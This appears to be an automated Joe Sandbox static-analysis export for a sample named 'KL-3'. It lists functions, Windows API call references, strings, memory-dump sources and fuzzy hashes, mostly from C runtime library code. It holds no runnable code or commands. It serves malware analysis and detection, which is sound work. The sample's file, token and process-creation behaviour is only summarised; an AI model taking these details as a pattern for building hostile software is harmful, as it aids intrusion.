Part of subcall function 00007FF6F9251578: free.LIBCMT ref: 00007FF6F925166A
Part of subcall function 00007FF6F9251578: _lclose.KERNEL32 ref: 00007FF6F9251676

Part of subcall function 00007FF6F9251694: SetFilePointer.KERNELBASE ref: 00007FF6F92516C0
Part of subcall function 00007FF6F9251694: _lread.KERNEL32(?,?,00000000,00007FF6F9252090), ref: 00007FF6F92516D5
Part of subcall function 00007FF6F9251694: lstrcpyA.KERNEL32(?,?,00000000,00007FF6F9252090), ref: 00007FF6F92516EB
Part of subcall function 00007FF6F9251694: malloc.LIBCMT ref: 00007FF6F9251705
Part of subcall function 00007FF6F9251694: SetFilePointer.KERNELBASE ref: 00007FF6F9251725
Part of subcall function 00007FF6F9251694: _lread.KERNEL32(?,?,00000000,00007FF6F9252090), ref: 00007FF6F9251739
Part of subcall function 00007FF6F9251694: _lcreat.KERNEL32 ref: 00007FF6F9251755
Part of subcall function 00007FF6F9251694: lstrcpyA.KERNEL32(?,?,00000000,00007FF6F9252090), ref: 00007FF6F925176D
Part of subcall function 00007FF6F9251694: free.LIBCMT ref: 00007FF6F92517D6

Part of subcall function 00007FF6F9251C88: wsprintfA.USER32 ref: 00007FF6F9251D31
Part of subcall function 00007FF6F9251C88: lstrlenA.KERNEL32 ref: 00007FF6F9251D41
Part of subcall function 00007FF6F9251C88: lstrcatA.KERNEL32 ref: 00007FF6F9251D58
Part of subcall function 00007FF6F9251C88: lstrcatA.KERNEL32 ref: 00007FF6F9251D65
Part of subcall function 00007FF6F9251C88: wsprintfA.USER32 ref: 00007FF6F9251D7D
Part of subcall function 00007FF6F9251C88: lstrcatA.KERNEL32 ref: 00007FF6F9251D89
Part of subcall function 00007FF6F9251C88: lstrcatA.KERNEL32 ref: 00007FF6F9251D96
Part of subcall function 00007FF6F9251C88: wsprintfA.USER32 ref: 00007FF6F9251DAF
Part of subcall function 00007FF6F9251C88: lstrcatA.KERNEL32 ref: 00007FF6F9251DBB
Part of subcall function 00007FF6F9251C88: lstrcatA.KERNEL32 ref: 00007FF6F9251DC8
Part of subcall function 00007FF6F9251C88: wsprintfA.USER32 ref: 00007FF6F9251DE0
Part of subcall function 00007FF6F9251C88: lstrcatA.KERNEL32 ref: 00007FF6F9251DEC
Part of subcall function 00007FF6F9251C88: lstrcatA.KERNEL32 ref: 00007FF6F9251DF9
Part of subcall function 00007FF6F9251C88: GetCurrentProcess.KERNEL32 ref: 00007FF6F9251E04
Part of subcall function 00007FF6F9251C88: OpenProcessToken.ADVAPI32 ref: 00007FF6F9251E17
Part of subcall function 00007FF6F9251C88: malloc.LIBCMT ref: 00007FF6F9251E35

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: Filelstrcat$lstrcpy$Directory$wsprintf$Currentlstrlen$DeleteMovePointer_lreadfreemalloc$CreateProcessRemove_lcreat$AttributesOpenPathSleepTempToken_lclose_lopen
String ID:
API String ID: 1722154105-0
Opcode ID: 5d700d46a4a826c95268ac6175f08a7b044a4c60bc541fb641729bbb9d71854b
Instruction ID: 838f62df45b517987f6c380662de133285190384295a49fe92428b9a2ae54acc
Opcode Fuzzy Hash: 5d700d46a4a826c95268ac6175f08a7b044a4c60bc541fb641729bbb9d71854b
Instruction Fuzzy Hash: 2821EC32A2954793FB14AF29AE512BA23A1AF94B54F894030D51EC71DDFF3CE889C700

Non-executed Functions

Function 00007FF6F9255D98 Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 136
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(?,?,?,00000000,00007FF6F9253FD4,00007FF6F9252E80), ref: 00007FF6F9255DDD
GetProcAddress.KERNEL32(?,?,?,00000000,00007FF6F9253FD4,00007FF6F9252E80), ref: 00007FF6F9255DF9
EncodePointer.KERNEL32(?,?,?,00000000,00007FF6F9253FD4,00007FF6F9252E80), ref: 00007FF6F9255E0B
GetProcAddress.KERNEL32(?,?,?,00000000,00007FF6F9253FD4,00007FF6F9252E80), ref: 00007FF6F9255E22
EncodePointer.KERNEL32(?,?,?,00000000,00007FF6F9253FD4,00007FF6F9252E80), ref: 00007FF6F9255E2B
GetProcAddress.KERNEL32(?,?,?,00000000,00007FF6F9253FD4,00007FF6F9252E80), ref: 00007FF6F9255E42
EncodePointer.KERNEL32(?,?,?,00000000,00007FF6F9253FD4,00007FF6F9252E80), ref: 00007FF6F9255E4B
GetProcAddress.KERNEL32(?,?,?,00000000,00007FF6F9253FD4,00007FF6F9252E80), ref: 00007FF6F9255E62
EncodePointer.KERNEL32(?,?,?,00000000,00007FF6F9253FD4,00007FF6F9252E80), ref: 00007FF6F9255E6B
GetProcAddress.KERNEL32(?,?,?,00000000,00007FF6F9253FD4,00007FF6F9252E80), ref: 00007FF6F9255E8A
EncodePointer.KERNEL32(?,?,?,00000000,00007FF6F9253FD4,00007FF6F9252E80), ref: 00007FF6F9255E93
DecodePointer.KERNEL32(?,?,?,00000000,00007FF6F9253FD4,00007FF6F9252E80), ref: 00007FF6F9255EC6
DecodePointer.KERNEL32(?,?,?,00000000,00007FF6F9253FD4,00007FF6F9252E80), ref: 00007FF6F9255ED6
DecodePointer.KERNEL32(?,?,?,00000000,00007FF6F9253FD4,00007FF6F9252E80), ref: 00007FF6F9255F2C
DecodePointer.KERNEL32(?,?,?,00000000,00007FF6F9253FD4,00007FF6F9252E80), ref: 00007FF6F9255F4D
DecodePointer.KERNEL32(?,?,?,00000000,00007FF6F9253FD4,00007FF6F9252E80), ref: 00007FF6F9255F67

Strings

GetUserObjectInformationW, xrefs: 00007FF6F9255E51
USER32.DLL, xrefs: 00007FF6F9255DD6
GetActiveWindow, xrefs: 00007FF6F9255E11
GetProcessWindowStation, xrefs: 00007FF6F9255E80
GetLastActivePopup, xrefs: 00007FF6F9255E31
MessageBoxW, xrefs: 00007FF6F9255DEF

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
API String ID: 2643518689-564504941
Opcode ID: 377389066e194beb257b6cc4c990508dbe9e31df47bede6a1fcbae8ebeac0d24
Instruction ID: d83a38c370649c08a00b6da47c181a97ab564c4054f1a133dee129862cbf2ee5
Opcode Fuzzy Hash: 377389066e194beb257b6cc4c990508dbe9e31df47bede6a1fcbae8ebeac0d24
Instruction Fuzzy Hash: 3C51F329A3AB0381FF559F69BE1457923A0AF49B90F444435DD2EC27ECFE7DE4498240

Function 00007FF6F9253D40 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 159
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_set_error_mode.LIBCMT ref: 00007FF6F9253D85
_set_error_mode.LIBCMT ref: 00007FF6F9253D96
GetModuleFileNameW.KERNEL32 ref: 00007FF6F9253DF8

Part of subcall function 00007FF6F925338C: GetCurrentProcess.KERNEL32(00007FF6F925342E), ref: 00007FF6F92533A4

GetStdHandle.KERNEL32 ref: 00007FF6F9253F0D
WriteFile.KERNEL32 ref: 00007FF6F9253F6A

Strings

<program name unknown>, xrefs: 00007FF6F9253E07
..., xrefs: 00007FF6F9253E4A
Microsoft Visual C++ Runtime Library, xrefs: 00007FF6F9253EB1
Runtime Error!Program: , xrefs: 00007FF6F9253DC5

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 2183313154-4022980321
Opcode ID: 2fd597ed130682cdad83eb5e5509c53fb8165203a3ef8c33a1dd45f2f99eb7af
Instruction ID: f03b671140661c30775e00588d00b85852d6b1a0fa189f85dc50627f1776e115
Opcode Fuzzy Hash: 2fd597ed130682cdad83eb5e5509c53fb8165203a3ef8c33a1dd45f2f99eb7af
Instruction Fuzzy Hash: 2A51D225A3864282F724DF2DAE556BA62A0BF85794F405135EE6DC3ADDEF3CE505C200

Function 00007FF6F9252680 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF6F92533A4,00007FF6F925342E), ref: 00007FF6F9253FF7
RtlLookupFunctionEntry.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF6F92533A4,00007FF6F925342E), ref: 00007FF6F9254016
RtlVirtualUnwind.KERNEL32 ref: 00007FF6F9254062
IsDebuggerPresent.KERNEL32 ref: 00007FF6F92540D4
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6F92540EC
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6F92540F9
GetCurrentProcess.KERNEL32 ref: 00007FF6F9254112
TerminateProcess.KERNEL32 ref: 00007FF6F9254120

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
String ID:
API String ID: 3778485334-0
Opcode ID: def16fc24cee703d4a5537edd1a08e3f5afa767f0e92b5f445a4ac4bfec6e0a8
Instruction ID: 99ad7ac66c37bc8e99733370d79de8a1f125c39f6fe1c35ecdff0afdc7bebe20
Opcode Fuzzy Hash: def16fc24cee703d4a5537edd1a08e3f5afa767f0e92b5f445a4ac4bfec6e0a8
Instruction Fuzzy Hash: 8B31B03592AB4286FB549F58EE4436A63A4FB84754F504036DAADC27ACEF7CE0898740

Function 00007FF6F9253240 Relevance: 9.1, APIs: 6, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6F92532AD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6F92532C5
RtlVirtualUnwind.KERNEL32 ref: 00007FF6F92532FF
IsDebuggerPresent.KERNEL32 ref: 00007FF6F9253335
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6F925333F
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6F925334A

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 212812d41cc70271c4644ed950498d631a3e0901e36617f5dee6308be7f1040b
Instruction ID: fd5bdd1a54f6fbfe0322ddec8b737f1d0199295f346d35ee32a05207ea44e4d3
Opcode Fuzzy Hash: 212812d41cc70271c4644ed950498d631a3e0901e36617f5dee6308be7f1040b
Instruction Fuzzy Hash: 9B315732528B8296EB64CF29ED406AE73A4FB44754F500135EAADC3B9DEF38D545CB40

Function 00007FF6F9254D20 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6F9254D57
GetCurrentProcessId.KERNEL32 ref: 00007FF6F9254D62
GetCurrentThreadId.KERNEL32 ref: 00007FF6F9254D6E
GetTickCount.KERNEL32 ref: 00007FF6F9254D7A
QueryPerformanceCounter.KERNEL32 ref: 00007FF6F9254D8B

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 45f2579fbe85fb05cdb622c58f7eecb08a7dcc8e069338e3c73b3b5a557e8f9d
Instruction ID: 55577ea798647ae24996f8a1f164c0040377063e159d8a857ef77a86aaeedb69
Opcode Fuzzy Hash: 45f2579fbe85fb05cdb622c58f7eecb08a7dcc8e069338e3c73b3b5a557e8f9d
Instruction Fuzzy Hash: 1D011221639A4182FB50CF29EE442656360FB45B90F446631DE6EC77ECFE7CD9958700

Function 00007FF6F92542FC Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6F9254307

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: bbde7a5f8c646a9abf88cbaeb42008ad304d5913e347a707f2b19ea3527e0825
Instruction ID: de3d7442304e9d11fc4757f00e5d99fd1fba2308ba922d7c4eb91aad95cfd8bd
Opcode Fuzzy Hash: bbde7a5f8c646a9abf88cbaeb42008ad304d5913e347a707f2b19ea3527e0825
Instruction Fuzzy Hash: 13B09214E29442C1E708AF399D8506022A06B98301FC10430C01DC01A8EE9C919B8700

Function 00007FF6F9256424 Relevance: 107.7, APIs: 86, Instructions: 180
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.LIBCMT ref: 00007FF6F9256439

Part of subcall function 00007FF6F9252A80: RtlFreeHeap.NTDLL ref: 00007FF6F9252A96
Part of subcall function 00007FF6F9252A80: _errno.LIBCMT ref: 00007FF6F9252AA0
Part of subcall function 00007FF6F9252A80: GetLastError.KERNEL32 ref: 00007FF6F9252AA8

free.LIBCMT ref: 00007FF6F9256442
free.LIBCMT ref: 00007FF6F925644B
free.LIBCMT ref: 00007FF6F9256454
free.LIBCMT ref: 00007FF6F925645D
free.LIBCMT ref: 00007FF6F9256466
free.LIBCMT ref: 00007FF6F925646E
free.LIBCMT ref: 00007FF6F9256477
free.LIBCMT ref: 00007FF6F9256480
free.LIBCMT ref: 00007FF6F9256489
free.LIBCMT ref: 00007FF6F9256492
free.LIBCMT ref: 00007FF6F925649B
free.LIBCMT ref: 00007FF6F92564A4
free.LIBCMT ref: 00007FF6F92564AD
free.LIBCMT ref: 00007FF6F92564B6
free.LIBCMT ref: 00007FF6F92564BF
free.LIBCMT ref: 00007FF6F92564CB
free.LIBCMT ref: 00007FF6F92564D7
free.LIBCMT ref: 00007FF6F92564E3
free.LIBCMT ref: 00007FF6F92564EF
free.LIBCMT ref: 00007FF6F92564FB
free.LIBCMT ref: 00007FF6F9256507
free.LIBCMT ref: 00007FF6F9256513
free.LIBCMT ref: 00007FF6F925651F
free.LIBCMT ref: 00007FF6F925652B
free.LIBCMT ref: 00007FF6F9256537
free.LIBCMT ref: 00007FF6F9256543
free.LIBCMT ref: 00007FF6F925654F
free.LIBCMT ref: 00007FF6F925655B
free.LIBCMT ref: 00007FF6F9256567
free.LIBCMT ref: 00007FF6F9256573
free.LIBCMT ref: 00007FF6F925657F
free.LIBCMT ref: 00007FF6F925658B
free.LIBCMT ref: 00007FF6F9256597
free.LIBCMT ref: 00007FF6F92565A3
free.LIBCMT ref: 00007FF6F92565AF
free.LIBCMT ref: 00007FF6F92565BB
free.LIBCMT ref: 00007FF6F92565C7
free.LIBCMT ref: 00007FF6F92565D3
free.LIBCMT ref: 00007FF6F92565DF
free.LIBCMT ref: 00007FF6F92565EB
free.LIBCMT ref: 00007FF6F92565F7
free.LIBCMT ref: 00007FF6F9256603
free.LIBCMT ref: 00007FF6F925660F
free.LIBCMT ref: 00007FF6F925661B
free.LIBCMT ref: 00007FF6F9256627
free.LIBCMT ref: 00007FF6F9256633
free.LIBCMT ref: 00007FF6F925663F
free.LIBCMT ref: 00007FF6F925664B
free.LIBCMT ref: 00007FF6F9256657
free.LIBCMT ref: 00007FF6F9256663
free.LIBCMT ref: 00007FF6F925666F
free.LIBCMT ref: 00007FF6F925667B
free.LIBCMT ref: 00007FF6F9256687
free.LIBCMT ref: 00007FF6F9256693
free.LIBCMT ref: 00007FF6F925669F
free.LIBCMT ref: 00007FF6F92566AB
free.LIBCMT ref: 00007FF6F92566B7
free.LIBCMT ref: 00007FF6F92566C3
free.LIBCMT ref: 00007FF6F92566CF
free.LIBCMT ref: 00007FF6F92566DB
free.LIBCMT ref: 00007FF6F92566E7
free.LIBCMT ref: 00007FF6F92566F3
free.LIBCMT ref: 00007FF6F92566FF
free.LIBCMT ref: 00007FF6F925670B
free.LIBCMT ref: 00007FF6F9256717
free.LIBCMT ref: 00007FF6F9256723
free.LIBCMT ref: 00007FF6F925672F
free.LIBCMT ref: 00007FF6F925673B
free.LIBCMT ref: 00007FF6F9256747
free.LIBCMT ref: 00007FF6F9256753
free.LIBCMT ref: 00007FF6F925675F
free.LIBCMT ref: 00007FF6F925676B
free.LIBCMT ref: 00007FF6F9256777
free.LIBCMT ref: 00007FF6F9256783
free.LIBCMT ref: 00007FF6F925678F
free.LIBCMT ref: 00007FF6F925679B
free.LIBCMT ref: 00007FF6F92567A7
free.LIBCMT ref: 00007FF6F92567B3
free.LIBCMT ref: 00007FF6F92567BF
free.LIBCMT ref: 00007FF6F92567CB
free.LIBCMT ref: 00007FF6F92567D7
free.LIBCMT ref: 00007FF6F92567E3
free.LIBCMT ref: 00007FF6F92567EF
free.LIBCMT ref: 00007FF6F92567FB
free.LIBCMT ref: 00007FF6F9256807

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: free$ErrorFreeHeapLast_errno
String ID:
API String ID: 1012874770-0
Opcode ID: edf86528549fd4a00d74b300e45061d263b74162cadb0a9473ea1ce4b70a9a46
Instruction ID: c2d988797289ce85c62e0f930fca8b1dd7dadbec9d1ef57baf2be85d68b652b0
Opcode Fuzzy Hash: edf86528549fd4a00d74b300e45061d263b74162cadb0a9473ea1ce4b70a9a46
Instruction Fuzzy Hash: 9CA16422A2A54781FB51BE39CD952FD2320AF84B54F044132DA6ECA1EFDF14D84583D0

Function 00007FF6F925517C Relevance: 19.6, APIs: 13, Instructions: 90
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__free_lconv_mon.LIBCMT ref: 00007FF6F92551D4

Part of subcall function 00007FF6F9256880: free.LIBCMT ref: 00007FF6F925689E
Part of subcall function 00007FF6F9256880: free.LIBCMT ref: 00007FF6F92568B0
Part of subcall function 00007FF6F9256880: free.LIBCMT ref: 00007FF6F92568C2
Part of subcall function 00007FF6F9256880: free.LIBCMT ref: 00007FF6F92568D4
Part of subcall function 00007FF6F9256880: free.LIBCMT ref: 00007FF6F92568E6
Part of subcall function 00007FF6F9256880: free.LIBCMT ref: 00007FF6F92568F8
Part of subcall function 00007FF6F9256880: free.LIBCMT ref: 00007FF6F925690A
Part of subcall function 00007FF6F9256880: free.LIBCMT ref: 00007FF6F925691C
Part of subcall function 00007FF6F9256880: free.LIBCMT ref: 00007FF6F925692E
Part of subcall function 00007FF6F9256880: free.LIBCMT ref: 00007FF6F9256940
Part of subcall function 00007FF6F9256880: free.LIBCMT ref: 00007FF6F9256955
Part of subcall function 00007FF6F9256880: free.LIBCMT ref: 00007FF6F925696A
Part of subcall function 00007FF6F9256880: free.LIBCMT ref: 00007FF6F925697F

free.LIBCMT ref: 00007FF6F92551C8

Part of subcall function 00007FF6F9252A80: RtlFreeHeap.NTDLL ref: 00007FF6F9252A96
Part of subcall function 00007FF6F9252A80: _errno.LIBCMT ref: 00007FF6F9252AA0
Part of subcall function 00007FF6F9252A80: GetLastError.KERNEL32 ref: 00007FF6F9252AA8

free.LIBCMT ref: 00007FF6F92551EA
__free_lconv_num.LIBCMT ref: 00007FF6F92551F6
free.LIBCMT ref: 00007FF6F9255202
free.LIBCMT ref: 00007FF6F925520E
free.LIBCMT ref: 00007FF6F9255232
free.LIBCMT ref: 00007FF6F9255246
free.LIBCMT ref: 00007FF6F9255255
free.LIBCMT ref: 00007FF6F9255261
free.LIBCMT ref: 00007FF6F925528E
free.LIBCMT ref: 00007FF6F92552B6
free.LIBCMT ref: 00007FF6F92552D0

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: free$ErrorFreeHeapLast__free_lconv_mon__free_lconv_num_errno
String ID:
API String ID: 518839503-0
Opcode ID: 094efc2225f9f2392aa1777af50b5dff1d3982708f759f17dcac6798e4219b3e
Instruction ID: 61f68dbab71dd21e3bfa8c407b3de4e2b0006b2244f8f980761a1b30ecfd5d46
Opcode Fuzzy Hash: 094efc2225f9f2392aa1777af50b5dff1d3982708f759f17dcac6798e4219b3e
Instruction Fuzzy Hash: 3B411036E2A54284FF65EF69CE507B92360AF44B54F184031DA2EC62DDEF6DA881C390

Function 00007FF6F925698C Relevance: 15.2, APIs: 10, Instructions: 206COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF6F9256A26
malloc.LIBCMT ref: 00007FF6F9256A8F
MultiByteToWideChar.KERNEL32 ref: 00007FF6F9256AC3
LCMapStringW.KERNEL32 ref: 00007FF6F9256AEA
LCMapStringW.KERNEL32 ref: 00007FF6F9256B32
malloc.LIBCMT ref: 00007FF6F9256B8F

Part of subcall function 00007FF6F9252AC0: _FF_MSGBANNER.LIBCMT ref: 00007FF6F9252AF0
Part of subcall function 00007FF6F9252AC0: HeapAlloc.KERNEL32 ref: 00007FF6F9252B15
Part of subcall function 00007FF6F9252AC0: _callnewh.LIBCMT ref: 00007FF6F9252B2E
Part of subcall function 00007FF6F9252AC0: _errno.LIBCMT ref: 00007FF6F9252B39
Part of subcall function 00007FF6F9252AC0: _errno.LIBCMT ref: 00007FF6F9252B44

LCMapStringW.KERNEL32 ref: 00007FF6F9256BC4
WideCharToMultiByte.KERNEL32 ref: 00007FF6F9256C04
free.LIBCMT ref: 00007FF6F9256C18
free.LIBCMT ref: 00007FF6F9256C29

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

